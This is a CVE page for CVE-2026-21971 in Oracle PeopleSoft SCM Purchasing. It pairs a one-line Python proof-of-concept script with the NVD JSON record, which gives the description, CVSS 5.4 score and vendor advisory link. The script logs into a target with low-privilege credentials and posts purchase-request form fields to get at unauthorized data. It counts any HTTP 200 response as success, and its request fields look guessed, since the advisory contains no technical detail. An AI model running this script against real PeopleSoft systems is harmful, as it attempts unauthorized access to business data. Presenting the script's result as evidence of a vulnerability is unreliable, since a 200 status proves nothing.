CVE-2026-21971

# CVE-2026-21971 PoC - Oracle PeopleSoft SCM Purchasing Unauthorized Data Access # This PoC demonstrates the vulnerability pattern (for authorized testing only) import requests import sys # Configuration TARGET_URL = "https://vulnerable-server/psp/ps/" CVE_ID = "CVE-2026-21971" def test_vulnerability(target_url, username, password): """ Test for CVE-2026-21971: Unauthorized data access in PeopleSoft Purchasing This script demonstrates the vulnerability pattern for authorized security testing. """ headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)", "Content-Type": "application/x-www-form-urlencoded" } # Step 1: Authentication (using low-privileged account) login_data = { "userid": username, "pwd": password, ".ptlang": "ENG", ".ptinstalledlang": "ENG" } session = requests.Session() try: # Attempt login login_response = session.post(target_url + "EMPLOYEE/HRMS/c/PTPP_PORTAL_ROOT_OBJECT", data=login_data, headers=headers, verify=False, timeout=30) if login_response.status_code == 200: # Step 2: Access Purchasing module with low privileges purchasing_url = target_url + "EMPLOYEE/HRMS/c/PSC_PURCHASING" purchasing_response = session.get(purchasing_url, headers=headers, timeout=30) if purchasing_response.status_code == 200: # Step 3: Attempt unauthorized data access # This demonstrates the vulnerability pattern exploit_data = { "ICAction": "PSC_PURCHASE_REQ", "PTADD": "1", "BUSINESS_UNIT": "US001" } exploit_response = session.post(purchasing_url, data=exploit_data, headers=headers, timeout=30) # Check if unauthorized access was successful if exploit_response.status_code == 200: print(f"[!] {CVE_ID} Vulnerability may be present - unauthorized access detected") return True print(f"[*] {CVE_ID} Testing completed") return False except requests.RequestException as e: print(f"[*] Error during testing: {e}") return False if __name__ == "__main__": if len(sys.argv) < 4: print(f"Usage: python {sys.argv[0]} <target_url> <username> <password>") print(f"Example: python {sys.argv[0]} https://peoplesoft.example.com/ps/ testuser testpass") sys.exit(1) test_vulnerability(sys.argv[1], sys.argv[2], sys.argv[3])

{"cve": {"id": "CVE-2026-21971", "sourceIdentifier": "[email protected]", "published": "2026-01-20T22:16:00.210", "lastModified": "2026-01-29T14:47:26.827", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vulnerability in the PeopleSoft Enterprise SCM Purchasing product of Oracle PeopleSoft (component: Purchasing). The supported version that is affected is 9.2. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise PeopleSoft Enterprise SCM Purchasing. Successful attacks of this vulnerability can result in unauthorized update, insert or delete access to some of PeopleSoft Enterprise SCM Purchasing accessible data as well as unauthorized read access to a subset of PeopleSoft Enterprise SCM Purchasing accessible data. CVSS 3.1 Base Score 5.4 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N)."}, {"lang": "es", "value": "Vulnerabilidad en el producto PeopleSoft Enterprise SCM Purchasing de Oracle PeopleSoft (componente: Purchasing). La versión compatible que se ve afectada es 9.2. Vulnerabilidad fácilmente explotable permite a un atacante con pocos privilegios y acceso a la red vía HTTP comprometer PeopleSoft Enterprise SCM Purchasing. Ataques exitosos de esta vulnerabilidad pueden resultar en acceso no autorizado de actualización, inserción o eliminación a algunos de los datos accesibles de PeopleSoft Enterprise SCM Purchasing, así como acceso de lectura no autorizado a un subconjunto de los datos accesibles de PeopleSoft Enterprise SCM Purchasing. Puntuación Base CVSS 3.1 de 5.4 (Impactos en la Confidencialidad e Integridad). Vector CVSS: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:oracle:peoplesoft_supply_chain_management_purchasing:9.2:*:*:*:*:*:*:*", "matchCriteriaId": "33380872-8382-41C9-B640-35FA5DCF1046"}]}]}], "references": [{"url": "https://www.oracle.com/security-alerts/cpujan2026.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}